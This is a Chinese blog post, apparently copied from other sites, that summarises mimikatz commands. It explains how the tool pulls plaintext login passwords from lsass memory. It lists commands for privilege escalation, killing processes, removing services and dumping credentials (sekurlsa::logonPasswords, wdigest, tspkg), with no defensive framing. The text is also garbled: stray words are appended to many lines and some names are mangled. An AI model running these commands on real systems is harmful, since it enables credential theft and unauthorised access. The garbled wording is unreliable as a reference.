神器mimikatz使用命令方法总结
神器mimikatz使用命令方法总结html
文章地址:http://www.isharepc.com/300.htmlweb
mimikatz是一款功能强大的轻量级调试神器,经过它你能够提高进程权限注入进程读取进程内存,固然他最大的亮点也是让阿刚最感兴趣的就是他能够直接从 lsass中获取当前处于Active系统的登陆密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登录策略,一般咱们在登录系统时输入密码以后,密码便会储存在 lsass内存中,通过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是经过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就能够经过他获取到登录密码,只限当前登录系统!算法
下面简单的介绍一下神器的命令windows
- cls-----------------------------清屏
- exit----------------------------退出
- version------------查看mimikatz的版本
- system::user-----查看当前登陆的系统用户
- system::computer-------查看计算机名称
- process::list------------------列出进程
- process::suspend 进程名称 -----暂停进程
- process::stop 进程名称---------结束进程
- process::modules --列出系统的核心模块及所在位置
- service::list---------------列出系统的服务
- service::remove-----------移除系统的服务
- service::start stop 服务名称--启动或中止服务
- privilege::list---------------列出权限列表
- privilege::enable--------激活一个或多个权限
- privilege::debug-----------------提高权限
- nogpo::cmd------------打开系统的cmd.exe
- nogpo::regedit -----------打开系统的注册表
- nogpo::taskmgr-------------打开任务管理器
- ts::sessions-----------------显示当前的会话
- ts::processes------显示进程和对应的pid状况等
- sekurlsa::wdigest-----获取本地用户信息及密码
- sekurlsa::tspkg------获取tspkg用户信息及密码
- sekurlsa::logonPasswords--获登录用户信息及密码
在网上找了一篇,可是和个人工具不是同样sass
文章地址:http://www.2cto.com/article/201407/318229.html安全
ps:copy~服务器
mimikatz是法国的一位神牛写的神器,该神器有很强大的功能,听说已经被集成在metasplosession
1.常规的操做使用命令工具
mimikatz # cls -->清屏,相似dos命令cls.加密
mimikatz # exit -->退出mimikatz.
mimikatz #version -->查看当前的mimikatz的版本.
随便输入"xxx::",会提示"modules:'xxx' intr0uvable",大概意思就是你输入的命令不存在,而后会列出全部可用的命令
查看列表中命令的具体参数一样能够输入"命令::"来查看,好比:"inject::",如图:
能够看到命令inject的具体参数有pid,process,service等……
2.系统方面的操做使用命令:system
mimikatz #system::user -->查看当前登陆的系统用户
mimikazt #system::computer -->返回当前的计算机名称
3.在服务器终端的操做命令: ts
mimikatz #ts::sessions -->显示当前的会话
mimikatz #ts::processes windows-d.vm.nirvana.local -->显示服务器的进程和对应的pid状况等。
4.系统服务相关的操做使用命令:service
5.系统进程相关操做的使用命令:process
6.系统线程相关操做使用命令:thread
7.系统句柄相关操做使用命令:handle
8.加密相关操做使用命令:crypto
9.注入操做使用命令:inject
具体的各类神器功能使用有待神人挖掘,表示不会外文压力很大……
分享从lsass抓去系统的明文密码案例
- 1. mimikatz常用命令总结
- 2. Mimikatz 法国神器
- 3. mimikatz使用方法
- 4. Ping 命令的使用方法总结
- 5. windows Mimikatz使用方法
- 6. Burpsuite神器经常使用功能使用方法总结
- 7. scp命令用法总结
- 8. 法国大面包 mimikatz使用方法
- 9. 法国大面包mimikatz使用方法
- 10. NPM使用命令总结
- 更多相关文章...
- • Docker 容器使用 - Docker教程
- • Kotlin 使用命令行编译 - Kotlin 教程
- • Docker 清理命令
- • 算法总结-回溯法
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. Appium入门
- 2. Spring WebFlux 源码分析(2)-Netty 服务器启动服务流程 --TBD
- 3. wxpython入门第六步(高级组件)
- 4. CentOS7.5安装SVN和可视化管理工具iF.SVNAdmin
- 5. jedis 3.0.1中JedisPoolConfig对象缺少setMaxIdle、setMaxWaitMillis等方法,问题记录
- 6. 一步一图一代码,一定要让你真正彻底明白红黑树
- 7. 2018-04-12—(重点)源码角度分析Handler运行原理
- 8. Spring AOP源码详细解析
- 9. Spring Cloud(1)
- 10. python简单爬去油价信息发送到公众号
- 1. mimikatz常用命令总结
- 2. Mimikatz 法国神器
- 3. mimikatz使用方法
- 4. Ping 命令的使用方法总结
- 5. windows Mimikatz使用方法
- 6. Burpsuite神器经常使用功能使用方法总结
- 7. scp命令用法总结
- 8. 法国大面包 mimikatz使用方法
- 9. 法国大面包mimikatz使用方法
- 10. NPM使用命令总结